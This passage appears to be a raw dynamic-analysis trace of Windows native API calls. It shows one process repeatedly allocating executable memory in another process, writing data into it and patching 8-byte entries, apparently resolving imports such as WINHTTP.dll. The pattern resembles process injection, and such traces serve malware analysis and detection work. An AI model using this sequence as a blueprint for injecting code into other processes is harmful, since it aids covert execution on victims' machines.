returned 0x0 [0241.381] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.381] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.381] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.381] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c8e4*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c8e4*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.382] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.382] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.382] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.382] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.382] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.382] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.382] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.383] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.383] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.383] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.383] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.383] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.383] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a068, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.383] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52ca02, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="WINHTTP.dll") returned 12 [0241.383] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.383] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0241.384] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.384] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.384] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.384] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.384] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.384] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.384] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.387] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.387] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.387] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.387] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.387] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.387] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.388] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c930*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c930*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0241.388] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.388] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.388] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.388] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.388] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.388] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.388] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.389] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.389] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.389] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.389] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.389] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.389] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.389] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.389] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c908*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c908*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.390] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.390] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.390] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.390] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.390] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.390] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.390] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.391] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.391] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.391] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.391] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.391] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.391] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a200, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.391] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x32, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.391] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c9c8*, NumberOfBytesToWrite=0x1a, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c9c8*, NumberOfBytesWritten=0x28df88*=0x1a) returned 0x0 [0241.391] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.392] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.392] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.392] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.392] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.392] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.392] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.392] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.393] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.393] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.393] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2002a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.393] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.393] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a208, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.393] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.393] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c9e4*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c9e4*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.393] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.393] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.394] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.394] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.394] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.394] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.394] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.394] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.394] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.395] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.395] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.395] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.395] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a210, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.395] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.395] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c946*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c946*, NumberOfBytesWritten=0x28df88*=0x17) returned 0x0 [0241.395] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.395] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.396] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.396] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.396] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.396] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.396] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.396] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.396] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.396] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.397] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20027, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.397] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.397] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a218, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.397] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.397] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c960*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c960*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.397] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.397] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.398] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.398] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.398] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.398] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.398] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.398] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.398] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.398] NtFreeVirtualMemory 